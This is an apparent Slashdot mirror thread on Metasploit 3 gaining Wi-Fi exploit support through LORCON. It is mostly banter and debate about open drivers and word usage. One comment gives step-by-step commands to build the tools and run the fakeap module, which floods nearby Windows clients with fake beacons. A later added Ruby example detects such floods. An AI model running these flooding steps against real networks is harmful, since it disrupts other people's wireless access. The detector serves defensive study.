Slashdot Mirror


Wi-Fi Exploits Coming to Metasploit

bucksDrop writes "Eweek.com is reporting that the Metasploit Project will add 802.11 (Wi-Fi) exploits to a new version of its point-and-click attack tool. Metasploit 3 will integrate kernel-mode payloads to allow users to use existing user-mode payloads for both kernel and non-kernel exploits. Metasploit is collaborating with Jon 'Johnny Cache' Ellch and implementing it by wrapping the LORCON library."

15 of 50 comments

  1. Thanks Guys by 99BottlesOfBeerInMyF · · Score: 3, Insightful

    No really, I appreciate all the work that goes into putting this together. I'm sure privately distributed cracking tools already have some of this functionality. Maybe this will get OS vendors to pay a little more attention to wireless security. Wireless is not likely to be a widely exploited mechanism for a worm, but it is still something that needs more attention.

  2. Math problem by Anonymous Coward · · Score: 3, Funny

    W=10.1
    F=9.8
    i=2673.7

    What is Wi-Fi?

    1. Re:Math problem by richdun · · Score: 2, Funny

      0.3i

    2. Re:Math problem by dr.badass · · Score: 4, Funny

      i=2673.7

      With Metasploit you can make i = 4456.66

      --
      Don't become a regular here -- you will become retarded.

    3. Re:Math problem by Anonymous Coward · · Score: 3, Informative

      For those too lazy to work it out...

      Wi-Fi = i(W-F) = 3673.7 (0.3) = 802.11

    4. Re:Math problem by Grym · · Score: 4, Funny

      My God! That'd be like 9/11 times 4.8921! We can't allow this to happen!

      -Grym

  3. So..... by robpoe · · Score: 2, Funny

    Do I wrap my laptop in tinfoil yet, or not?

    --
    = Grow a brain...

  4. This begs the question... by mohjlir · · Score: 2, Interesting

    Why don't hardware vendors simply release the source to their drivers so problems like this can be squashed quickly? Of course, there is no guarantee that the white hats will find problems before the black hats do, but it exposes flaws to more eyeballs.

    1. Re:This begs the question... by 99BottlesOfBeerInMyF · · Score: 3, Insightful

      Why don't hardware vendors simply release the source to their drivers so problems like this can be squashed quickly?

      Some of them probably will, but a lot of hardware vendors are reflexively secretive. Others use the drivers to work around bugs in their products or are embarrassed by the shoddy quality of their code. I'd love to believe that the industry will start to demand open source drivers, but realistically, it is more likely that the OS developer community will have to account for untrusted hardware drivers by seriously re-architecting the way the kernel interacts with drivers.

    2. Re:This begs the question... by ehrichweiss · · Score: 2, Informative

      I don't know why others might not release their drivers' source, but I know that Broadcom apparently can't do it for at least some of their wireless cards because they apparently can be tuned into some military-only frequencies, and needless to say that's not a good thing.

      --
      0x09F911029D74E35BD84156C5635688C0

    3. Re:This begs the question... by cdrguru · · Score: 2, Insightful

      The number one reason this isn't done is the difference between the hardware manufactured by the driver author and the hardware manufactured by slave labor in China is the driver. Period. The chips are nearly a commodity now. There isn't anything unique about that - it is how they are used in the software.

      15-20 years ago, it was the design of the hardware that was where the value was. Today, it is mostly the software running the hardware.

      An open driver just means that they are giving away whatever value the design has to the factory in China which will sell the same unit for half the price. Not a real effective way to stay in business.

  5. So where is the code? Right here. by spinja · · Score: 5, Informative

    Install the latest Lorcon snapshot from:
    http://www.802.11mercenary.net/lorcon/

    Grab the latest version of metasploit 3:
    $ svn co http://metasploit.com/svn/framework3/trunk/

    Compile the Metasploit Lorcon wrapper:
    $ cd trunk/external/msflorcon
    $ make

    Plug in a supported network card (I use a WPN511 with the madwifi-old driver in Gentoo)

    Load the Metasploit Console (as root, since it needs raw WiFi access)
    # trunk/msfconsole

    Play with some of the demo modules :-)

    This is an example of sending fake beacon requests to flood the Windows Wireless Network Browser:
    msf > use auxiliary/dos/wireless/fakeap
    msf auxiliary(fakeap) > show options

    Module options:

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       CHANNEL    11               yes       The default channel number
       DRIVER     madwifi          yes       The name of the wireless driver for lorcon
       INTERFACE  ath0             yes       The name of the wireless interface

    Type the "run" command, or use "set VARIABLE VALUE" to change these options.

    msf auxiliary(fakeap) > run
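    The fakeap demo above floods a client with beacons from access points that do not exist. As an added example (not Metasploit or Lorcon code, and not from the poster), here is a small Ruby beacon parser and a sliding-window detector that flags the pattern a wireless monitoring sensor would look for: a burst of many distinct BSSIDs in a short interval. It assumes raw 802.11 frames with no radiotap header, constructs its own sample captures, and uses an arbitrary window and threshold.

```ruby
# Added example, not Metasploit or Lorcon code: parse raw 802.11 beacon frames
# (assumed: no radiotap header in front of the frame) and flag a beacon flood.
# Build a minimal beacon frame for the constructed sample captures below.
def build_beacon(bssid, ssid)
  # frame control 0x0080 = management/beacon, duration, broadcast DA, SA, BSSID, seq
  header = [0x80, 0, 0, 0].pack('C4') + ([0xff] * 6).pack('C6') + bssid + bssid + [0, 0].pack('C2')
  fixed  = [0, 100, 0x0401].pack('Q<vv')            # timestamp, beacon interval, capability
  header + fixed + [0, ssid.bytesize].pack('C2') + ssid.b   # tagged parameter 0 = SSID
end

# Return { bssid:, ssid: } for a beacon, nil for any other or truncated frame.
def parse_beacon(frame)
  return nil if frame.bytesize < 36                  # 24-byte header + 12 bytes fixed params
  fc = frame.getbyte(0)
  return nil unless ((fc >> 2) & 0x3) == 0 && ((fc >> 4) & 0xf) == 8
  bssid = frame.byteslice(16, 6).unpack('C6').map { |b| '%02x' % b }.join(':')
  pos, ssid = 36, nil
  while pos + 2 <= frame.bytesize                    # walk the tagged parameters
    tag, len = frame.getbyte(pos), frame.getbyte(pos + 1)
    break if pos + 2 + len > frame.bytesize          # bogus length: stop, never over-read
    if tag == 0 then ssid = frame.byteslice(pos + 2, len); break end
    pos += 2 + len
  end
  { bssid: bssid, ssid: ssid }
end

# A real site shows a handful of BSSIDs; dozens of new ones within a second is the
# signature of a fake-AP flood. frames = [[seconds, raw_frame], ...] in capture order.
def beacon_flood?(frames, window: 1.0, threshold: 20)
  recent = []                                        # [time, bssid] pairs inside the window
  frames.each do |t, raw|
    b = parse_beacon(raw) or next
    recent << [t, b[:bssid]]
    recent.shift while recent.first[0] < t - window
    return true if recent.map(&:last).uniq.size >= threshold
  end
  false
end

# Constructed sample captures: three office APs beaconing every 100 ms for two seconds,
# versus forty distinct fake BSSIDs arriving 10 ms apart.
def normal_capture
  aps = (1..3).map { |n| [[0, 0x1a, 0x2b, 0, 0, n].pack('C6'), "office-#{n}"] }
  (0...20).flat_map { |i| aps.map { |b, s| [i * 0.1, build_beacon(b, s)] } }
end

def flood_capture
  (0...40).map { |n| [n * 0.01, build_beacon([0xde, 0xad, 0, 0, 0, n].pack('C6'), "free-wifi-#{n}")] }
end
```

On a live sensor the same detector would be fed frames from a monitor-mode interface; the window and threshold should be tuned to the number of legitimate access points at the site.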

    1. Re:So where is the code? Right here. by towsonu2003 · · Score: 3, Funny

      sounds to me like it needs a GUI ;)

  6. Re:You must be a perscriber by Dhalka226 · · Score: 3, Insightful

    Language is how the majority use it, not how scholars define it.

    So I guess "loose" and "lose" are now synonymous...

    I just really don't agree. I'm not the kind who generally goes off on people for misusing words as long as I can understand what they're trying to say, but at the same time, words have meanings. The fact that people have no idea how to properly use those words should not change what the words mean. It should just make us exceptionally sad at the state of affairs our communications skills are in.

    Incidentally, this is coming from somebody who misused the phrase "begs the question" dozens of times in his life. The difference being, when it was pointed out to me (I forget if somebody said something or I just came across the correct usage one day), I actually made a mental note of it and I have used it properly since then. It wasn't hard. Neither, as my little joke intimated, is using "lose" and "loose" properly. It just takes a little conscious effort at first, and then it will become second nature.

    Personally I think we should be getting people to do that rather than pandering to them and altering the meaning of words and phrases once we reach some ignorance threshold.

  7. Re:You must be a perscriber by foamrotreturns · · Score: 3, Insightful

    I am very much in agreement. If the masses are allowed to dictate whatever meaning they choose for words or phrases they hear, they will slowly erode the vast variety of meanings that can be conveyed through speech and writing. If I said "That begs the question" 75 years ago, most people would realize that I was calling out the speaker for using a circular argument. Saying "That begs the question" today evokes responses like "What question?" The meaning is nearly lost. We have hundreds of thousands of simple words and phrases that we use to convey much more complex concepts. If we let our language become eroded by the uneducated masses, how will we become educated? We will waste all of our time explaining our ideas in excruciating detail rather than using the previously ubiquitous simplified words and phrases that were crafted to symbolize those very concepts.

    Don't use words and phrases for which you haven't learned the meanings!